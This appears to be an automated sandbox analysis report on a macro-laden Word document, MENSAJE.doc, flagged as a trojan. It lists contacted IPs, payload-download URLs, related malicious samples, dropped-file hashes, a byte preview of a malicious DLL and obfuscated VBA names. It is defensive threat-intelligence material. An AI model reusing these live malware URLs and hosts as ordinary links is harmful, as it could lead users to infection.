                                    http://nadysa.compowershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    217.144.106.11
                                    unknownIran (ISLAMIC Republic Of)
                                    204213NETMIHANIRtrue
                                    84.232.229.24
                                    unknownRomania
                                    8708RCS-RDS73-75DrStaicoviciROtrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:343668
                                    Start date:25.01.2021
                                    Start time:11:19:52
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 4s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:MENSAJE.doc
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • GSI enabled (VBA)
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winDOC@32/8@1/2
                                    EGA Information:
                                    • Successful, ratio: 92.3%
                                    HDC Information:
                                    • Successful, ratio: 33.6% (good quality ratio 24.1%)
                                    • Quality average: 58.5%
                                    • Quality standard deviation: 37.9%
                                    HCA Information:
                                    • Successful, ratio: 86%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .doc
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Found warning dialog
                                    • Click Ok
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Execution Graph export aborted for target powershell.exe, PID 2308 because it is empty
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    11:20:36API Interceptor1x Sleep call for process: msg.exe modified
                                    11:20:36API Interceptor36x Sleep call for process: powershell.exe modified
                                    11:20:50API Interceptor426x Sleep call for process: rundll32.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    217.144.106.115390080_2021_1-259043.docGet hashmaliciousBrowse
                                    • originpart.com/wp-content/acStl/
                                    5390080_2021_1-259043.docGet hashmaliciousBrowse
                                    • originpart.com/wp-content/acStl/
                                    MENSAJE.docGet hashmaliciousBrowse
                                    • nadysa.com/wp-content/Almet/
                                    info.docGet hashmaliciousBrowse
                                    • originpart.com/wp-content/acStl/
                                    84.232.229.24MENSAJE.docGet hashmaliciousBrowse
                                    • 84.232.229.24/40hbu1ld1mxg/gbxh6m/w00gy5ya8o03k/
                                    MES-2021_01_22-3943960.docGet hashmaliciousBrowse
                                    • 84.232.229.24/yy5pra4h/
                                    Documento 2201 01279.docGet hashmaliciousBrowse
                                    • 84.232.229.24/6zji6l/
                                    DATI 2021.docGet hashmaliciousBrowse
                                    • 84.232.229.24/hu5n7nnlfn8qzz44/4teiln75sss0k/j8fl359hk405/rlm4iik5i1da/3l3lpmieamhaykhkk/
                                    informazioni 536-32772764.docGet hashmaliciousBrowse
                                    • 84.232.229.24/o6p3ixr1vo/0nwr6v/oxpej1lly6ntbn4xn2/x9kd6qn1qdqyq/d0lxoj4a8vrn/
                                    Meddelelse-58931636.docGet hashmaliciousBrowse
                                    • 84.232.229.24/m4mfruuzgu2ajo8qu7t/bl7ktqi5zlffcg/x8ofu4so7/loe8ts1l0p5/nzne9gz6/76ki44u754xsh/
                                    doc_2201_3608432.docGet hashmaliciousBrowse
                                    • 84.232.229.24/jcmzbwn9r7yck/wlh8myw/
                                    13-2021.docGet hashmaliciousBrowse
                                    • 84.232.229.24/g4fo4/gsc17oaf9ynv0wo/670mqqf8vrds/5wmsg3x72r/mh2sm8tbg/2jp5a8m51xtysk3vljn/
                                    MAIL-224201 277769577.docGet hashmaliciousBrowse
                                    • 84.232.229.24/nef4co7lnfc9omq/gcs3bqsea9h/by1c/ujdlxj02m6twsi0q/5qqr6ck1fl34uz4g8l/tck4x5pqu8pykii6lbl/

                                    Domains

                                    No context

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    RCS-RDS73-75DrStaicoviciROMENSAJE.docGet hashmaliciousBrowse
                                    • 84.232.229.24
                                    MES-2021_01_22-3943960.docGet hashmaliciousBrowse
                                    • 84.232.229.24
                                    Documento 2201 01279.docGet hashmaliciousBrowse
                                    • 84.232.229.24
                                    DATI 2021.docGet hashmaliciousBrowse
                                    • 84.232.229.24
                                    informazioni 536-32772764.docGet hashmaliciousBrowse
                                    • 84.232.229.24
                                    Meddelelse-58931636.docGet hashmaliciousBrowse
                                    • 84.232.229.24
                                    doc_2201_3608432.docGet hashmaliciousBrowse
                                    • 84.232.229.24
                                    13-2021.docGet hashmaliciousBrowse
                                    • 84.232.229.24
                                    MAIL-224201 277769577.docGet hashmaliciousBrowse
                                    • 84.232.229.24
                                    Arch_05_222-3139.docGet hashmaliciousBrowse
                                    • 5.2.136.90
                                    MENSAJE 2021.docGet hashmaliciousBrowse
                                    • 5.2.136.90
                                    Documento_0501_012021.docGet hashmaliciousBrowse
                                    • 5.2.136.90
                                    Datos_019_9251.docGet hashmaliciousBrowse
                                    • 5.2.136.90
                                    document_84237-299265042.docGet hashmaliciousBrowse
                                    • 5.2.136.90
                                    ARCH-012021-21-1934.docGet hashmaliciousBrowse
                                    • 5.2.136.90
                                    Mensaje K-158701.docGet hashmaliciousBrowse
                                    • 5.2.136.90
                                    Datos-2021-4-377562.docGet hashmaliciousBrowse
                                    • 5.2.136.90
                                    INFO.docGet hashmaliciousBrowse
                                    • 5.2.136.90
                                    MAIL-0573188.docGet hashmaliciousBrowse
                                    • 5.2.136.90
                                    Bestand.docGet hashmaliciousBrowse
                                    • 5.2.136.90
                                    NETMIHANIR5390080_2021_1-259043.docGet hashmaliciousBrowse
                                    • 217.144.106.11
                                    5390080_2021_1-259043.docGet hashmaliciousBrowse
                                    • 217.144.106.11
                                    MENSAJE.docGet hashmaliciousBrowse
                                    • 217.144.106.11
                                    info.docGet hashmaliciousBrowse
                                    • 217.144.106.11
                                    SecuriteInfo.com.Trojan.PackedNET.507.9142.exeGet hashmaliciousBrowse
                                    • 89.32.249.155
                                    RFQSDCL1005C1N5STDFM01.docGet hashmaliciousBrowse
                                    • 89.32.249.155
                                    dhl.exeGet hashmaliciousBrowse
                                    • 89.39.208.218
                                    http://emiliaclarki.com/graphing-lab-ifr8w/microsoft-365-keeps-prompting-for-password.htmlGet hashmaliciousBrowse
                                    • 89.32.250.20
                                    http://negahprinting.ir/fitness-write-505ei/usnorthcom.htmlGet hashmaliciousBrowse
                                    • 89.42.209.236
                                    Payment Advice.xlsxGet hashmaliciousBrowse
                                    • 89.39.208.139
                                    7H5vz7YpcM.docGet hashmaliciousBrowse
                                    • 217.144.104.55
                                    XUgRg2eJRT.docGet hashmaliciousBrowse
                                    • 217.144.104.55
                                    g9LflPVB7a.docGet hashmaliciousBrowse
                                    • 217.144.104.55
                                    afqAtl5Onl.docGet hashmaliciousBrowse
                                    • 217.144.104.55
                                    HlBgjf93UN.docGet hashmaliciousBrowse
                                    • 217.144.104.55
                                    knUTWH2JBb.docGet hashmaliciousBrowse
                                    • 217.144.104.55
                                    19gxoguxLl.docGet hashmaliciousBrowse
                                    • 217.144.104.55
                                    VTjuj7r7yz.docGet hashmaliciousBrowse
                                    • 217.144.104.55
                                    dsgl1yi7Ij.docGet hashmaliciousBrowse
                                    • 217.144.104.55
                                    YCSp7PiD4m.docGet hashmaliciousBrowse
                                    • 217.144.104.55

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4380F3E0-FFD8-4816-B513-C2DC6937B540}.tmp
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1024
                                    Entropy (8bit):0.05390218305374581
                                    Encrypted:false
                                    SSDEEP:3:ol3lYdn:4Wn
                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                    Malicious:false
                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4A859C42-B329-43DD-B686-F01B0F0382FA}.tmp
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1536
                                    Entropy (8bit):1.3573187972516119
                                    Encrypted:false
                                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbD:IiiiiiiiiifdLloZQc8++lsJe1MzE
                                    MD5:7B7B0FAAC058615FA256F298EF50E033
                                    SHA1:532BC89D18E5E4E80A09AF2EE2F1849F0D313BA3
                                    SHA-256:BF975FC2572A6799BFB7B382A5B60FC5925092E90C23992635E7A4A80E23468C
                                    SHA-512:E1ED55DD9A3C5D3B36D3762DE0DD0E29CF2C1B29BEB84A99158397C6FE7D140F4B542D507016A97F75726102E8929AE64DFEF1233C56258B9FB27FF77B2A4A5C
                                    Malicious:false
                                    Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\MENSAJE.LNK
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Mon Jan 25 18:20:32 2021, length=171008, window=hide
                                    Category:dropped
                                    Size (bytes):1994
                                    Entropy (8bit):4.527931653903523
                                    Encrypted:false
                                    SSDEEP:24:8xSZ4m/XTr6N4U8lQieyDv3qa+dM7dD2xSZ4m/XTr6N4U8lQieyDv3qa+dM7dV:82/XT+NnIQimPQh22/XT+NnIQimPQ/
                                    MD5:ED526E0371646C21736FC4B49050A11D
                                    SHA1:F4404635521C1880F87EDAB9050515639F75C7AF
                                    SHA-256:14D12A370FCFDF33A2B1729D6410191DF8033C8640D1B49B703117D69323E36F
                                    SHA-512:6654BF24BF6CEB9BD6619C43E8B89C5AB2239D6E74BE831D765E43F5010B031F727342BA673D142D611B32624A8552507A6743162AA323448370010DD6AF16C8
                                    Malicious:false
                                    Preview: L..................F.... ...y.=..{..y.=..{...B.&O................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....^.2.....9R.. .MENSAJE.doc.D.......Q.y.Q.y*...8.....................M.E.N.S.A.J.E...d.o.c.......u...............-...8...[............?J......C:\Users\..#...................\\760639\Users.user\Desktop\MENSAJE.doc.".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.E.N.S.A.J.E...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......760639..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..
                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):59
                                    Entropy (8bit):4.0685274819550825
                                    Encrypted:false
                                    SSDEEP:3:M19rcowFomX19rcov:MMxay
                                    MD5:9BE8489A077CDD735AB03D3C19C939E9
                                    SHA1:66A47FB266D52AED31E065408D1159EEC08BC3AA
                                    SHA-256:84FE6C43E64A4EE18EC57F48077808C47AEB632452750B6A1B98920AC7931040
                                    SHA-512:D8D933961AC4D7591D0AC7A20066EFCEADD3F122E05CC733F786A21FB0ECB935A8965D26445077197C7C4B26F16C0E3F491636E51606ABE52AFF3BBE4AC620CE
                                    Malicious:false
                                    Preview: [doc]..MENSAJE.LNK=0..MENSAJE.LNK=0..[doc]..MENSAJE.LNK=0..
                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.431160061181642
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                    MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                    SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                    SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                    SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                    Malicious:false
                                    Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7PDJ5QC81VWL5221GXZU.temp
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.586698549442453
                                    Encrypted:false
                                    SSDEEP:96:chQCsMqftMqvsqvJCwo5z8hQCsMqftMqvsEHyqvJCworvz1PYftJHyf8Iht+lUVJ:cy3o5z8y7Hnorvz1bf8IVIu
                                    MD5:938EBE9D3E192FE703709754C8C13AD3
                                    SHA1:669D15EA186E5265982DBD1740A8D161AE519FD9
                                    SHA-256:F6DD8092D12C97BAABC1BCA05BCB811463295A013A2E756C1DFD85609E3E6536
                                    SHA-512:AA7EE59E375EF40A960C8F195CDA18299C9E83412EAEF1C2C034449E6696AEEE8EE4C249CD90E5784BCB94DAB54EC6DCD7F023076B3CA3381727ABA373FB27AA
                                    Malicious:false
                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    C:\Users\user\Desktop\~$ENSAJE.doc
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.431160061181642
                                    Encrypted:false
                                    SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                    MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                    SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                    SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                    SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                    Malicious:false
                                    Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                    C:\Users\user\Liq8l58\Egok7ei\D64O.dll
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):354648
                                    Entropy (8bit):4.290297401493491
                                    Encrypted:false
                                    SSDEEP:3072:G82jpiC2JG7HZb7XWQml/jz8A4diTE90Q6kF4CKAYRkcj:V2L7HN7Kl/jLA90QECrYRpj
                                    MD5:2F6D3710BC30929A6715AD41166D74EF
                                    SHA1:39EA18E56A1C596FBD7569D858CCB525E4EE1817
                                    SHA-256:2BD8450DF65CDB30DFEA00F5DAA67E578E5D890C26EE7D692E5264F38650758C
                                    SHA-512:2B1BAB83437F3720FD298FEFA5FD26B5500B3ED32F70F89F5758054EF2C27BC49AE028FEE15A0878F7ECBAC961B7E05BA84E085DC1238F2BFBA9ABF77526DD75
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Metadefender, Detection: 46%, Browse
                                    • Antivirus: ReversingLabs, Detection: 79%
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P...............................................................................`..d....................T..X............................................................a..`............................text....6.......8.................. ..`.rdata..W....P.......<..............@..@.data........`.......>..............@....text4.......p.......B..............@....text8..d............H.............. ..@.text7..d............J.............. ..@.text6..d............L.............. ..@.text5..d............N.............. ..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Outdoors, Outdoors & Shoes Personal Loan Account Unbranded one-to-one circuit Generic Fresh Tuna Money Market Account Compatible Roads, Author: Federico Briones, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 19:01:00 2021, Last Saved Time/Date: Fri Jan 22 19:01:00 2021, Number of Pages: 1, Number of Words: 3199, Number of Characters: 18238, Security: 8
                                    Entropy (8bit):6.737500124615803
                                    TrID:
                                    • Microsoft Word document (32009/1) 79.99%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                    File name:MENSAJE.doc
                                    File size:170496
                                    MD5:cca3520e9a551b59637a6f7cecf4b39f
                                    SHA1:cbc4f477ab784d5b13f0f1bae27cd89e0b2ac10c
                                    SHA256:0965ec391a19f82dbbcc65557513a1b5a98d0fbec1c3a7f66aa6e32e667fb5a0
                                    SHA512:7a6603f1d4f29137c30387d6a0e09d58c04e1bd27064e538f922ed33ba064efa813da97009121e768fafdb3570490836df9efbd7dd98149f1cedbcfeb75b56f1
                                    SSDEEP:3072:0wT4Oqdduoxt7lrTdcrrXyQBsc0vWJVi4IrwVLYbdYPeFmfG5/+vG1Pt4kom3N7:0wT4Oqdduoxt7lWPIIU
                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                    File Icon

                                    Icon Hash:e4eea2aaa4b4b4a4

                                    Static OLE Info

                                    General

                                    Document Type:OLE
                                    Number of OLE Files:1

                                    OLE File "MENSAJE.doc"

                                    Indicators

                                    Has Summary Info:True
                                    Application Name:Microsoft Office Word
                                    Encrypted Document:False
                                    Contains Word Document Stream:True
                                    Contains Workbook/Book Stream:False
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:
                                    Flash Objects Count:
                                    Contains VBA Macros:True

                                    Summary

                                    Code Page:1252
                                    Title:
                                    Subject:Outdoors, Outdoors & Shoes Personal Loan Account Unbranded one-to-one circuit Generic Fresh Tuna Money Market Account Compatible Roads
                                    Author:Federico Briones
                                    Keywords:
                                    Comments:
                                    Template:Normal.dotm
                                    Last Saved By:
                                    Revion Number:1
                                    Total Edit Time:0
                                    Create Time:2021-01-22 19:01:00
                                    Last Saved Time:2021-01-22 19:01:00
                                    Number of Pages:1
                                    Number of Words:3199
                                    Number of Characters:18238
                                    Creating Application:Microsoft Office Word
                                    Security:8

                                    Document Summary

                                    Document Code Page:-535
                                    Number of Lines:151
                                    Number of Paragraphs:42
                                    Thumbnail Scaling Desired:False
                                    Company:
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:917504

                                    Streams with VBA

                                    VBA File Name: Nre_13r__v1meabhr2, Stream Size: 1121
                                    General
                                    Stream Path:Macros/VBA/Nre_13r__v1meabhr2
                                    VBA File Name:Nre_13r__v1meabhr2
                                    Stream Size:1121
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . , . . o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 2c 1d 9a 6f 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                    VBA Code Keywords

                                    Keyword
                                    False
                                    Private
                                    Attribute
                                    VB_Creatable
                                    VB_Name
                                    Document_open()
                                    VB_PredeclaredId
                                    VB_GlobalNameSpace
                                    VB_Base
                                    VB_Customizable
                                    VB_TemplateDerived
                                    VB_Exposed
                                    VBA Code
                                    VBA File Name: Twwejh034u32ebq, Stream Size: 701
                                    General
                                    Stream Path:Macros/VBA/Twwejh034u32ebq
                                    VBA File Name:Twwejh034u32ebq
                                    Stream Size:701
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . , . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 2c 1d 2a b1 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                    VBA Code Keywords

                                    Keyword
                                    Attribute
                                    VB_Name
                                    VBA Code
                                    VBA File Name: Uved9u320lyen, Stream Size: 25167
                                    General
                                    Stream Path:Macros/VBA/Uved9u320lyen
                                    VBA File Name:Uved9u320lyen
                                    Stream Size:25167
                                    Data ASCII:. . . . . . . . . l . . . . . . . . . . . . . . . t . . . . H . . . . . . . . . . , . N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 6c 10 00 00 d4 00 00 00 b8 01 00 00 ff ff ff ff 74 10 00 00 e0 48 00 00 00 00 00 00 01 00 00 00 2c 1d 4e 92 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                    VBA Code Keywords

                                    Keyword
                                    izsoCGvJ
                                    paWrAs
                                    (kVqKGDIMx
                                    fDCQH
                                    Until
                                    xhCZAq
                                    yXAkDJC
                                    dAZzFm
                                    XzAMGG
                                    PmwneAAr.Range
                                    ZQoRFxD.Range
                                    fLrHD,
                                    DjGAF(ruGLP)
                                    gQeIGU
                                    YOGNBFEJJ(JqRPV)
                                    yteeIh()
                                    UBound(FaeuQIDH)
                                    dmUsACgD
                                    tuwnUlI
                                    yoTKwqIsG
                                    onDpQWW()
                                    UBound(ifLwTt)
                                    RgCBRi
                                    UBound(VHywBeoD)
                                    foEzCEG
                                    (mUryG
                                    KLDUkJGJS
                                    IJmiCJ:
                                    xIuBj(oofPFJE)
                                    MidB$(tYjkQO,
                                    njcnja
                                    pUQjDD
                                    sHgJaG,
                                    BwbBAFi(foEzCEG)
                                    DkDVE()
                                    (paWrAs
                                    YOGNBFEJJ
                                    SDiGFGB
                                    VoGiD
                                    UBound(sRKFiF)
                                    FarLoFz
                                    SXiaV
                                    HPPUdFCC:
                                    beDixHFI
                                    KTfCJ,
                                    gRutBJw
                                    mhoxIuDG:
                                    OkhnVlkx
                                    zOxiWIIb
                                    emKogsJt,
                                    CxCcsO,
                                    kvOjif,
                                    rnekAzHd
                                    xUDGCFC,
                                    tYjkQO
                                    bIhNCID
                                    fQjtHB
                                    KBiNIsVg:
                                    AFprvHL(YuXlKu)
                                    HPPUdFCC
                                    FcSKHTIC
                                    PgRZHO()
                                    UODhfECCP.Range
                                    bxlKBdJEV
                                    sswIGoWgh.Range
                                    MidB$(yteeIh,
                                    kkPsepvID,
                                    eJQhi
                                    oofPFJE
                                    bxlKBdJEV:
                                    EJmBDY
                                    xDvjIOBFP
                                    CXFlxhCIJ,
                                    dxmcNDC
                                    qTPUJB
                                    GHdxC,
                                    cDhBGGFR
                                    VHywBeoD
                                    (iezxKGCjf
                                    PSrcCvsEO
                                    bHcuF
                                    xIuBj()
                                    OdqhFz
                                    IXzyVV
                                    moLoGCFdJ(fLrHD)
                                    JqRPV,
                                    CazGpHEDF.Range
                                    (JqRPV
                                    YOGNBFEJJ()
                                    YAMzFD:
                                    ruGLP
                                    dIEzTDWJ.Range
                                    QjrbGoAT
                                    mUryG,
                                    KiUcJFSiw
                                    (bPtpAAz
                                    WFlaEdEJF
                                    ruGLP,
                                    YAMzFD
                                    ifLwTt(IQtMAu)
                                    SJgnG
                                    wjnsc
                                    BwbBAFi()
                                    fagdu
                                    Qidjl:
                                    MidB$(onDpQWW,
                                    Qidjl
                                    oNAXGHF
                                    DjGAF
                                    iezxKGCjf
                                    (xUDGCFC
                                    nnjasd,
                                    Resume
                                    IXzyVV,
                                    ebgcAE
                                    onDpQWW(VmouN)
                                    (KTfCJ
                                    oLCGmAiCG
                                    yESSyEi.Range
                                    dGuTI
                                    EKKiJE.Range
                                    nWxKMVOBG
                                    EKKiJE
                                    xDvjIOBFP:
                                    BzqWhVTIQ
                                    VHywBeoD(dkffwCHGW)
                                    KBiNIsVg
                                    PmwneAAr
                                    UODhfECCP
                                    iScJlw
                                    aMdIG
                                    hOyBkq
                                    MidB$(PSrcCvsEO,
